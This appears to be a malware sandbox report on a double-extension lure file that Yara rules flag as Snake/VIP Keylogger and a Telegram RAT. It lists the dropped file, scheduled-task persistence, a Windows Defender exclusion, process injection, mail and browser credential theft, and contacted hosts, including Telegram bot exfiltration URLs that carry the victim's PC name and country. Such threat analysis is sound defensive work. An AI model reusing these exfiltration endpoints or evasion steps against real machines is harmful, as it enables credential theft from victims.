Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524790 Sample: GeriOdemeBildirimi942.rar.x... Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 3 other IPs or domains 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 15 other signatures 2->68 8 GeriOdemeBildirimi942.rar.xlxs.pdf.exe 7 2->8         started        12 SOFcFE.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\Roaming\SOFcFE.exe, PE32 8->38 dropped 40 C:\Users\user\...\SOFcFE.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpF6B6.tmp, XML 8->42 dropped 44 GeriOdemeBildirimi...ar.xlxs.pdf.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Injects a PE file into a foreign processes 8->74 14 GeriOdemeBildirimi942.rar.xlxs.pdf.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        76 Multi AV Scanner detection for dropped file 12->76 78 Machine Learning detection for dropped file 12->78 24 SOFcFE.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49729, 49747 TELEGRAMRU United Kingdom 14->52 54 awaratrendz.com 119.18.54.39, 21, 32582, 43366 PUBLIC-DOMAIN-REGISTRYUS India 14->54 56 3 other IPs or domains 14->56 80 Loading BitLocker PowerShell Module 18->80 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 36 conhost.exe 26->36         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 unknown United States
16989 UTMEMUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
119.18.54.39
 awaratrendz.com India
394695 PUBLIC-DOMAIN-REGISTRYUS true
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.130.0
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
awaratrendz.com 119.18.54.39 true
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.130.0 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    http://checkip.dyndns.org/ false
    • URL Reputation: safe
    		 unknown
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
      		unknown